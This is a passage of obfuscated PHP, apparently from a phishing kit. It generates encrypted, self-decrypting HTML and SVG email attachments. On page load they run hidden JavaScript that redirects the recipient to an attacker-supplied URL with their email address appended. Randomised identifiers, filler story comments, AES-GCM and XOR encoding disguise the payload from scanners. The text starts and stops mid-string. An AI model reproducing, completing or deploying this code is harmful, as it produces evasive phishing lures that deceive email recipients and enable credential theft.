0\40\x20\40\40\164\162\x79\40\173\xd\12\x20\x20\40\40\40\40\x20\x20\40\40\40\40\x20\x20\x20\40\x74\162\171\x20\x7b\15\xa\40\40\40\40\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\40\40\40\40{$Ecba9}\xd\12\40\x20\40\x20\x20\40\40\40\40\40\40\x20\x20\40\x20\40\175\40\x63\x61\164\143\x68\40\x28\145\x72\162\x6f\162\x32\51\x20\173\xd\xa\40\x20\x20\x20\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\40\40\x20\x20\143\157\x6e\163\x6f\x6c\x65\56\145\x72\162\x6f\162\50\x22\111\156\x6e\145\162\x20\145\x72\162\x6f\x72\40\62\x3a\x22\54\x20\145\x72\x72\157\x72\62\x29\x3b\15\xa\x20\40\40\x20\x20\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x7d\xd\12\x20\40\40\x20\40\x20\40\x20\x20\40\40\40\x7d\x20\x63\141\164\143\150\x20\50\145\x72\x72\157\162\61\51\40\x7b\15\12\x20\40\40\x20\40\40\40\x20\40\40\40\x20\x20\40\40\40\143\x6f\x6e\x73\x6f\154\x65\56\x65\162\x72\x6f\x72\50\42\117\165\x74\145\x72\x20\x65\162\x72\x6f\162\72\42\54\x20\x65\x72\x72\x6f\162\61\51\73\xd\xa\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\x7d\xd\12\x20\x20\x20\40\40\40\x20\40\x5d\135\x3e\xd\xa\x20\40\40\x20\74\x2f\x73\x63\162\x69\x70\x74\x3e\15\xa\xd\xa\40\40\x20\x20{$B7437[4]}\15\12\x3c\x2f\x73\166\x67\76"; goto B0e8d; B0e8d: } } goto fdda4; f083d: class HtmlSandboxAttachment { public function sandboxAttachment($Bca73, $e90ca) { goto D7e0c; B1de6: $B7437[] = TextUtils::generateStory(); goto d26e2; b60aa: goto b92b6; goto e13ba; F74fb: $f06b3 = $this->encrypt_data($cf128); goto Db595; d26e2: bc6a6: goto e2c28; a605a: $cf128 = json_encode(["\x66\x75\x6e\x63\x74\x69\x6f\x6e\x4e\x61\x6d\x65" => TextUtils::generateWord(10), "\143\157\144\x65" => "\x28\50\51\x20\x3d\x3e\x20\x7b\40\15\xa\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\40\x63\157\156\x73\164\x20\155\x65\x73\x73\141\147\x65\x20\75\x20\47{$B7437[0]}\47\x3b\x20\xd\12\40\x20\40\40\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\x72\145\x74\x75\162\x6e\x20\173\40\xd\xa\40\x20\x20\40\40\x20\x20\40\40\40\40\x20\40\40\40\x20\40\x20\40\x20\x73\x68\x6f\x77\101\154\x65\162\x74\x3a\x20\50\x29\40\x3d\76\40\143\x6f\x6e\x73\157\x6c\145\56\154\x6f\x67\50\x6d\145\163\x73\141\147\x65\51\x2c\40\xd\12\40\x20\x20\40\40\x20\x20\40\40\40\40\40\40\40\x20\40\x20\x20\x20\x20\x74\x65\163\164\114\x6f\x63\141\164\145\x3a\x20\50\x29\40\75\76\40\167\151\x6e\x64\x6f\167\x2e\x6c\x6f\143\x61\x74\151\x6f\156\x2e\141\163\x73\x69\147\x6e\x28\x27{$Bca73}\57\47\x20\53\40{$Cda68["\145\155\x61\x69\x6c\137\155\x65\163\163\x61\x67\x65"]}\51\x2c\x20\15\xa\40\40\x20\40\40\40\40\40\40\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\154\157\x67\115\145\163\x73\x61\147\x65\x3a\40\50\x29\x20\75\76\x20\x63\157\x6e\163\157\154\x65\56\x6c\157\x67\x28\155\145\163\x73\x61\147\145\x29\x20\xd\xa\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\175\73\40\15\xa\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\x7d\x29"]); goto F74fb; e50e1: if (!($daf1d < 15)) { goto b4fb2; } goto B1de6; cf429: $daf1d = 0; goto Af146; e13ba: b4fb2: goto a605a; e2f61: $B7437 = []; goto cf429; C6faf: echo $Aa442; goto e3cc0; Af146: b92b6: goto e50e1; C3966: $Aa442 = $this->generateHTMLTemplate($f06b3, $e90ca, $Cda68, $B7437); goto C6faf; ab2ff: header("\103\157\x6e\x74\145\156\x74\x2d\104\x69\x73\x70\157\x73\151\164\151\157\156\x3a\x20\141\164\x74\x61\143\x68\155\x65\156\164\x3b\40\x66\151\154\145\x6e\x61\x6d\x65\x3d\42\x65\x6e\143\162\171\x70\164\145\x64\56\150\164\x6d\154\42"); goto C3966; e2c28: $daf1d++; goto b60aa; Db595: header("\x43\157\x6e\x74\145\156\x74\x2d\x54\171\x70\x65\72\40\164\x65\170\164\x2f\x68\164\x6d\x6c"); goto ab2ff; D7e0c: $Cda68 = ["\145\x6d\141\x69\x6c\x5f\x6d\x65\x73\x73\141\147\x65" => TextUtils::generateWord(4), "\x65\156\x63\162\171\160\164\x65\x64\x44\x61\164\141" => TextUtils::generateWord(10), "\x65\156\x63\162\171\x70\164\x65\x64" => TextUtils::generateWord(10), "\x63\x72\x65\141\164\x65\x53\141\x6e\x64\x62\157\x78" => TextUtils::generateWord(10), "\163\141\156\144\142\157\170" => TextUtils::generateWord(10), "\160\141\162\163\x65\x64" => TextUtils::generateWord(10), "\146\165\156\143" => TextUtils::generateWord(10), "\x65\x78\145\x63\165\x74\x65" => TextUtils::generateWord(10), "\162\x65\x73\165\154\x74" => TextUtils::generateWord(10), "\153\145\x79" => TextUtils::generateWord(10), "\x63\157\155\x62\151\156\145\x64" => TextUtils::generateWord(10), "\144\145\x63\x72\171\160\164\145\x64\104\x61\x74\141" => TextUtils::generateWord(10), "\144\145\143\x72\x79\160\164\x65\x64" => TextUtils::generateWord(10), "\144\x65\155\x6f" => TextUtils::generateWord(10), "\145\156\x63\162\x79\160\x74\x65\144\102\171\x74\x65\163" => TextUtils::generateWord(10)]; goto e2f61; e3cc0: } private function encrypt_data($de805) { goto d1ae9; fa897: $A6e50 = openssl_encrypt($de805, "\x61\145\163\x2d\x32\x35\66\55\x67\143\155", $C8668, OPENSSL_RAW_DATA, $d4f37, $E1a30); goto B670f; B670f: return ["\x65\x6e\143\x72\171\160\x74\145\144" => base64_encode($A6e50), "\x69\x76" => base64_encode($d4f37), "\153\145\171" => base64_encode($C8668), "\164\141\147" => base64_encode($E1a30)]; goto Cd9c5; e71f9: $d4f37 = random_bytes(12); goto fa897; d1ae9: $C8668 = random_bytes(32); goto e71f9; Cd9c5: } private function generateHTMLTemplate($f06b3, $e90ca, $Cda68, $B7437) { $Aa442 = "\40\x20\x20\40\x20\40\x20\40\x3c\x21\104\117\x43\x54\x59\120\x45\x20\150\164\x6d\154\x3e\xd\12\x20\40\x20\x20\40\x20\40\x20\74\x68\x74\x6d\x6c\40\x6c\x61\156\x67\75\x22\145\x6e\42\76\15\12\40\40\40\40\x20\40\x20\x20\74\150\145\x61\x64\76\15\12\40\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\74\155\x65\164\141\40\143\x68\141\x72\x73\145\x74\x3d\42\x55\124\x46\x2d\x38\42\76\xd\xa\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x3c\x6d\145\164\141\x20\x6e\x61\155\x65\x3d\x22\166\151\145\167\x70\x6f\162\164\x22\40\143\157\x6e\164\145\156\x74\x3d\x22\167\x69\x64\x74\150\x3d\144\x65\x76\x69\143\x65\55\167\x69\144\164\x68\54\40\x69\156\151\x74\x69\141\x6c\x2d\x73\x63\x61\154\x65\x3d\x31\56\60\x22\x3e\xd\12\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\40\74\x74\151\164\x6c\x65\76\x45\x78\145\143\165\164\x69\x6f\156\74\x2f\x74\x69\164\154\x65\76\xd\12\x20\x20\x20\x20\x20\x20\40\x20\x3c\57\x68\x65\141\x64\76\15\xa\40\40\40\40\x20\x20\40\40\74\142\157\144\x79\76\15\xa\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\74\163\143\162\151\x70\164\x3e\xd\xa\40\40\40\40\40\x20\40\x20\x20\x20\40\x20\x63\157\156\163\164\40\x2f\52\40{$B7437[0]}\x20\52\x2f\40{$Cda68["\145\155\x61\151\154\x5f\x6d\x65\x73\163\x61\x67\145"]}\40\x3d\x20\x22{$e90ca}\42\73\15\xa\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\x2f\52\x20{$B7437[0]}\x20\52\57\15\xa\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\143\x6f\156\x73\164\40{$Cda68["\145\156\143\x72\171\x70\x74\x65\x64\104\141\164\x61"]}\40\75\40\173\15\12\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20{$Cda68["\145\156\x63\x72\x79\160\x74\x65\144"]}\72\40\x22{$f06b3["\x65\x6e\x63\162\171\160\164\x65\x64"]}\x22\54\xd\xa\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\x69\166\x3a\x20\42{$f06b3["\151\x76"]}\x22\54\xd\xa\x20\x20\x20\40\40\40\40\40\40\x20\40\x20\x20\x20\40\40\x6b\x65\171\72\40\42{$f06b3["\x6b\x65\171"]}\x22\54\xd\12\x20\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\164\x61\x67\x3a\x20\x22{$f06b3["\164\x61\147"]}\42\15\xa\x20\40\40\x20\40\40\x20\40\40\40\x20\x20\x7d\x3b\15\xa\15\xa\x20\x20\40\x20\40\40\40\x20\x20\40\40\x20\57\x2a\40{$B7437[1]}\x20\x2a\57\xd\12\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x66\165\x6e\143\164\151\x6f\x6e\x20{$Cda68["\143\x72\x65\x61\164\145\x53\x61\x6e\x64\x62\x6f\x78"]}\50\x63\157\144\x65\x29\40\173\xd\12\x20\40\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\143\157\x6e\163\164\40{$Cda68["\163\141\156\144\142\157\170"]}\x20\75\x20\x7b\xd\xa\40\40\x20\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\143\157\x6e\163\x6f\x6c\145\x3a\40\x7b\40\154\x6f\x67\72\x20\x28\155\x73\x67\x29\x20\75\x3e\40\x7b\x20\x63\x6f\x6e\163\157\x6c\145\x2e\x6c\x6f\147\50\x27\x5b\123\141\156\144\142\x6f\170\x5d\x3a\47\54\x20\155\163\x67\51\73\40\x7d\40\175\54\xd\12\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x61\154\x65\x72\164\x3a\40\50\x6d\163\x67\x29\40\x3d\76\40\x7b\x20{$Cda68["\x73\x61\x6e\144\x62\157\x78"]}\x2e\143\x6f\156\x73\157\x6c\x65\x2e\x6c\157\147\x28\140\101\154\x65\162\164\72\x20\44\x7b\155\163\147\x7d\x60\51\73\x20\x7d\xd\12\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\x7d\x3b\15\xa\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\40\x20\x74\162\171\40\173\15\xa\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x6c\145\164\x20\x70\141\x72\163\x65\x64\x20\x3d\x20\x4a\x53\x4f\x4e\x2e\x70\141\162\163\145\50\143\x6f\144\x65\51\73\xd\xa\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\x63\x6f\x6e\163\164\x20{$Cda68["\x66\x75\156\x63"]}\40\x3d\40\x6e\x65\x77\x20\106\x75\x6e\143\164\x69\157\156\50\x27\163\141\x6e\x64\142\x6f\170\x27\54\x20\x60\xd\xa\40\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\40\167\x69\x74\x68\40\50\x73\x61\156\x64\142\x6f\x78\51\40\x7b\40\xd\xa\40\40\40\x20\40\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x63\x6f\156\x73\164\x20\146\x6e\40\75\x20\x24\x7b\160\x61\x72\163\145\144\x2e\143\x6f\x64\145\x7d\73\15\xa\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\162\145\x74\165\162\156\x20\x66\x6e\73\15\12\x20\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\40\x20\175\15\12\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\140\51\x3b\xd\12\40\x20\40\40\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40\15\12\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\x72\145\164\x75\x72\x6e\40\173\xd\xa\x20\40\40\40\40\40\40\40\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\40\x20{$Cda68["\145\x78\145\143\165\164\x65"]}\72\x20\x28\51\40\x3d\76\x20\173\15\xa\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\40\40\40\164\x72\x79\x20\173\15\12\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\143\157\x6e\x73\x74\40{$Cda68["\162\145\x73\165\154\164"]}\x20\x3d\40{$Cda68["\x66\165\156\143"]}\50{$Cda68["\163\x61\156\144\142\x6f\x78"]}\x29\50\x29\73\15\12\x20\40\40\x20\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\x69\146\40\50\x74\x79\160\x65\157\146\x20{$Cda68["\162\x65\x73\165\x6c\x74"]}\40\x3d\75\75\x20\x27\157\x62\152\x65\x63\164\x27\x20\x26\x26\40{$Cda68["\x72\145\x73\165\x6c\x74"]}\40\x21\75\75\x20\x6e\x75\x6c\x6c\x29\40\173\xd\xa\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x4f\x62\x6a\x65\x63\164\56\153\x65\x79\163\50{$Cda68["\x72\x65\x73\165\154\x74"]}\x29\56\146\157\x72\105\x61\143\150\50\153\145\x79\40\75\x3e\40\x7b\15\12\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\40\40\40\40\40\x20\40\x20\40\x20\151\x66\x20\50\164\x79\x70\145\x6f\x66\x20{$Cda68["\162\x65\x73\x75\x6c\164"]}\x5b\x6b\145\x79\135\40\75\x3d\x3d\x20\x27\x66\165\156\x63\164\x69\157\156\47\x29\x20\x7b\15\xa\x20\40\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20{$Cda68["\x72\145\163\165\x6c\x74"]}\x5b\153\x65\x79\135\x28\51\73\xd\12\40\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\x20\x7d\xd\12\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\40\40\x20\x20\40\40\40\x20\40\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\x7d\x29\73\xd\xa\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\40\x20\40\x20\40\x7d\xd\12\40\x20\40\40\40\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\40\40\40\x7d\40\x63\141\164\x63\x68\x28\145\51\40\x7b\15\12\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\143\157\x6e\x73\157\x6c\x65\56\145\x72\162\157\162\x28\47\105\170\145\x63\x75\x74\x69\x6f\156\x20\x65\x72\x72\157\162\72\47\x2c\40\145\x29\x3b\15\xa\x20\40\40\40\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\40\40\40\175\15\12\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\175\xd\12\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\x7d\73\15\12\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\175\40\x63\141\164\143\x68\40\x28\145\x72\162\157\162\51\x20\x7b\15\12\40\x20\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\x20\143\157\x6e\163\157\154\x65\x2e\145\x72\162\157\162\50\x27\123\141\156\144\x62\x6f\170\40\x63\162\145\x61\164\151\157\156\40\x66\x61\x69\x6c\145\144\72\47\54\40\145\x72\x72\x6f\162\x29\73\15\12\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\40\40\40\40\x72\x65\164\165\x72\156\x20\x6e\165\154\x6c\73\xd\12\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x7d\xd\12\x20\40\x20\40\x20\40\40\40\40\40\40\x20\175\15\xa\15\xa\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x61\163\171\156\x63\x20\x66\165\156\143\x74\151\157\x6e\x20{$Cda68["\x64\145\155\x6f"]}\50\51\x20\173\xd\xa\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\40\x20\40\164\162\171\x20\173\xd\xa\40\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\143\x6f\x6e\x73\x74\40{$Cda68["\x65\x6e\x63\x72\171\160\164\x65\x64\x42\x79\164\145\x73"]}\x20\75\40\x55\x69\x6e\164\x38\101\x72\x72\141\171\x2e\x66\162\157\155\x28\x61\164\157\x62\50{$Cda68["\145\x6e\143\162\171\160\164\145\x64\104\141\x74\x61"]}\x2e{$Cda68["\145\156\143\x72\x79\160\x74\x65\144"]}\x29\x2c\x20\143\40\75\x3e\x20\x63\x2e\x63\150\141\x72\103\157\x64\145\x41\164\x28\x30\x29\51\73\xd\xa\40\40\40\40\x20\40\40\40\40\40\40\40\x20\40\40\40\x20\40\40\40\143\157\156\163\164\x20\151\166\40\x3d\x20\x55\151\156\x74\70\x41\162\x72\141\171\56\146\162\157\155\50\141\x74\157\x62\x28{$Cda68["\x65\x6e\x63\x72\171\x70\x74\145\x64\x44\141\164\x61"]}\56\151\x76\x29\54\40\x63\x20\x3d\x3e\40\143\56\143\150\141\x72\x43\x6f\x64\145\x41\164\50\60\51\51\73\15\xa\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x63\157\156\x73\164\x20\153\145\x79\x44\141\164\x61\x20\75\x20\125\151\x6e\x74\x38\101\x72\162\141\171\56\146\162\x6f\x6d\50\141\x74\157\142\x28{$Cda68["\x65\156\143\x72\x79\x70\x74\x65\144\x44\141\x74\x61"]}\56\153\145\171\51\x2c\40\143\40\75\x3e\40\x63\x2e\x63\x68\141\x72\x43\157\x64\x65\101\x74\x28\x30\x29\51\73\xd\xa\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x63\x6f\156\x73\164\x20\x74\x61\147\x20\75\x20\125\151\x6e\164\x38\101\162\162\141\x79\56\146\162\157\155\x28\x61\164\157\x62\50{$Cda68["\x65\156\143\162\x79\160\x74\x65\x64\x44\141\164\x61"]}\56\x74\141\x67\x29\x2c\40\143\40\x3d\76\x20\143\56\143\150\141\162\x43\x6f\144\x65\101\x74\x28\x30\x29\51\x3b\15\12\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\xd\12\40\40\40\40\x20\x20\40\x20\40\40\40\40\40\40\40\x20\x20\40\x20\x20\x63\x6f\x6e\163\x74\40{$Cda68["\153\145\171"]}\40\75\40\141\x77\x61\x69\164\x20\143\162\x79\x70\164\157\x2e\163\165\x62\x74\154\x65\56\x69\x6d\160\x6f\x72\164\113\x65\171\x28\15\xa\40\40\40\x20\x20\40\40\x20\40\x20\40\x20\40\40\40\40\x20\x20\x20\x20\40\x20\x20\40\42\162\x61\x77\42\x2c\40\x6b\x65\x79\x44\141\x74\141\54\x20\x22\101\105\x53\x2d\x47\103\115\x22\x2c\40\164\x72\165\145\54\x20\x5b\x22\144\x65\143\x72\x79\160\164\42\135\xd\xa\x20\40\x20\40\40\40\x20\x20\40\40\40\x20\40\40\40\40\x20\40\x20\40\x29\x3b\xd\12\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\x20\40\x20\15\12\x20\40\40\x20\40\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\143\x6f\x6e\x73\164\40{$Cda68["\x63\x6f\x6d\142\151\156\145\144"]}\40\x3d\40\156\x65\167\40\x55\x69\156\164\70\101\x72\162\x61\171\50\133\x2e\x2e\56{$Cda68["\145\156\x63\162\x79\160\164\145\144\102\x79\164\145\163"]}\54\x20\56\x2e\56\x74\141\147\135\51\73\xd\12\40\x20\40\x20\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\40\x63\157\x6e\x73\x74\40{$Cda68["\144\x65\x63\162\171\160\164\x65\x64\104\141\164\x61"]}\x20\x3d\40\x61\x77\x61\151\x74\x20\x63\162\x79\160\x74\157\x2e\x73\165\142\x74\x6c\145\x2e\x64\145\143\x72\x79\160\164\x28\15\12\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\40\173\40\156\141\155\x65\x3a\40\42\x41\105\x53\x2d\107\103\115\x22\54\40\x69\x76\72\x20\151\166\40\175\54\15\12\40\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\40\x20\x20\40\40{$Cda68["\153\x65\x79"]}\x2c\40{$Cda68["\143\x6f\x6d\142\151\x6e\x65\144"]}\xd\12\x20\x20\x20\x20\40\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\51\73\xd\12\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\40\xd\12\40\40\40\40\40\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x63\157\156\163\164\x20{$Cda68["\x64\x65\x63\162\171\x70\x74\145\144"]}\40\x3d\x20\x6e\x65\167\40\x54\145\x78\x74\x44\145\x63\x6f\x64\x65\162\50\x29\56\x64\x65\x63\157\144\145\x28{$Cda68["\144\x65\x63\162\171\x70\x74\145\x64\104\141\x74\x61"]}\51\x3b\15\12\x20\40\x20\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x63\157\x6e\x73\x74\x20\163\141\x6e\144\x62\x6f\x78\x20\75\40{$Cda68["\143\162\x65\141\164\x65\x53\x61\156\144\x62\157\x78"]}\x28{$Cda68["\144\145\143\x72\x79\160\164\x65\144"]}\51\x3b\15\xa\x20\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\x69\146\x20\x28\x73\x61\156\x64\x62\x6f\x78\x29\40\173\15\xa\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\x20\40\40\40\40\40\x20\40\163\x61\156\x64\142\157\170\x2e{$Cda68["\x65\x78\x65\143\165\x74\x65"]}\50\51\x3b\15\xa\40\40\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\x7d\15\12\x20\40\x20\40\40\40\40\40\40\40\x20\x20\40\x20\x20\x20\175\x20\143\141\x74\143\x68\x20\x28\145\x72\x72\157\x72\x29\x20\173\xd\xa\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\143\x6f\x6e\163\157\x6c\x65\56\145\x72\162\157\162\50\x22\105\x72\162\x6f\x72\72\x22\x2c\x20\x65\x72\162\x6f\x72\51\73\xd\xa\40\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x7d\xd\xa\x20\40\x20\40\x20\40\x20\40\40\x20\40\40\175\15\12\xd\12\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x77\151\156\x64\x6f\167\56\x61\x64\x64\x45\166\x65\156\x74\x4c\151\163\164\x65\x6e\x65\x72\50\47\x44\117\x4d\x43\157\x6e\x74\x65\x6e\x74\114\157\x61\x64\x65\144\47\x2c\x20{$Cda68["\144\145\x6d\x6f"]}\x29\73\15\xa\x20\40\40\40\x20\x20\x20\x20\x20\40\40\x20\74\57\163\x63\162\x69\160\164\x3e\xd\xa\x20\40\40\40\x20\x20\x20\x20\x3c\57\x62\x6f\x64\171\x3e\15\xa\x20\40\40\x20\40\x20\x20\40\74\57\x68\x74\155\154\x3e"; return $Aa442; } } goto C94da; fdda4: class MyHereEncryptor { private $Af2bc; private $Fcd19; public function __construct($Bca73, $e90ca) { $this->Af2bc = $Bca73; $this->Fcd19 = $e90ca; } public function generateKey($de805) { return substr(md5($de805 . "\x53\126\107\64\137\123\101\114\124"), 0, 16); } public function toReadableText($de805) { goto d5d8c; d5d8c: $fe398 = "\145\164\141\157\151\156\x73\x68\x72\144\154\x75\143\x6d\x66\x77\x79\160\166\x62\147\x6b\x6a\x71\170\172" . "\105\124\101\117\x49\x4e\x53\x48\x52\104\114\x55\103\115\106\x57\x59\x50\x56\x42\107\x4b\112\x51\130\x5a"; goto Ffe26; ab77d: $baca0 = ord($de805[$daf1d]); goto ffbc3; cf1f2: return $ac06c; goto c6298; baadd: $daf1d = 0; goto bb85e; f7223: if (!($daf1d < strlen($de805))) { goto E2c12; } goto ab77d; eb021: $daf1d++; goto ec690; ec690: goto E63e3; goto ed296; C9c1d: fd168: goto eb021; ffbc3: $ac06c .= $fe398[$baca0 >> 4] . $fe398[$baca0 & 0xf]; goto C9c1d; ed296: E2c12: goto cf1f2; bb85e: E63e3: goto f7223; Ffe26: $ac06c = ''; goto baadd; c6298: } public function encryptText($b9f2d) { goto ec627; ad96b: if (!($daf1d < strlen($b9f2d))) { goto f1869; } goto Db6aa; D7d69: f1869: goto e7f1d; fe621: bf7a7: goto Af9a0; bc162: goto B2976; goto D7d69; ddfe8: $daf1d = 0; goto c08a4; A9dee: return "\115\x79\x20" . $D3b01 . "\x20\150\x65\x72\145"; goto C6aad; e7f1d: $D3b01 = $this->toReadableText($C8668 . chr(8) . $A6e50); goto A9dee; Af9a0: $daf1d++; goto bc162; ec627: $C8668 = substr(md5($b9f2d . "\123\126\x47\64\x5f\123\101\114\124"), 0, 8); goto fbd30; c08a4: B2976: goto ad96b; fbd30: $A6e50 = ''; goto ddfe8; Db6aa: $A6e50 .= chr(ord($b9f2d[$daf1d]) ^ ord($C8668[$daf1d % 8])); goto fe621; C6aad: } public function generate() { goto Cf5b2; eb147: $this->Dfd7d = $Cda68; goto d9927; F0a10: return $Ecba9; goto dc06f; d9927: $A6e50 = $this->encryptText("\x77\151\x6e\x64\157\x77\56\x6c\157\x63\141\x74\x69\x6f\156\56\x68\x72\145\x66\x3d\42" . $this->Af2bc . "\57\x22\40\x2b\x20" . $Cda68["\141\165\164\x6f\x67\162\x61\142"] . "\73"); goto A8cc6; A8cc6: $B7437 = TextUtils::commentGenerateRandomStorySlash(); goto Cd157; Cd157: $Ecba9 = "\40\40\x20\x20\x66\165\156\x63\164\x69\157\156\40\146\162\157\155\122\145\x61\x64\141\142\154\x65\124\x65\x78\164\x28\x74\145\x78\x74\x29\40\x7b\xd\xa\40\x20\40\40\x20\x20\40\x20\x63\x6f\156\163\164\40\143\x68\x61\x72\163\x65\164\x20\75\40\47\145\x74\x61\x6f\x69\156\163\150\162\x64\x6c\x75\x63\155\146\167\x79\160\166\x62\147\x6b\152\x71\170\x7a\x27\x20\x2b\40\47\105\124\x41\x4f\x49\x4e\123\x48\122\104\x4c\x55\x43\115\106\x57\x59\x50\126\x42\107\113\x4a\121\x58\x5a\47\x3b\xd\12\x20\x20\40\x20\40\x20\x20\x20\x6c\x65\x74\x20\x72\145\x73\165\x6c\x74\40\x3d\40\47\47\x3b\xd\xa\x20\x20\x20\x20\x20\40\x20\x20\15\12\x20\x20\x20\40\40\40\x20\x20\146\x6f\162\x20\x28\154\145\164\x20\x69\40\x3d\40\60\x3b\40\x69\40\74\x20\x74\x65\x78\x74\56\154\145\156\147\x74\150\x3b\x20\x69\x20\x2b\75\x20\x32\51\40\173\15\xa\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x20\x63\x6f\156\x73\164\x20\150\151\x67\x68\40\75\40\143\150\x61\162\x73\x65\x74\56\x69\156\x64\145\170\117\x66\x28\x74\145\x78\164\x5b\x69\x5d\51\40\74\74\40\64\73\xd\xa\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x63\157\x6e\x73\164\x20\154\x6f\167\40\75\x20\143\150\x61\162\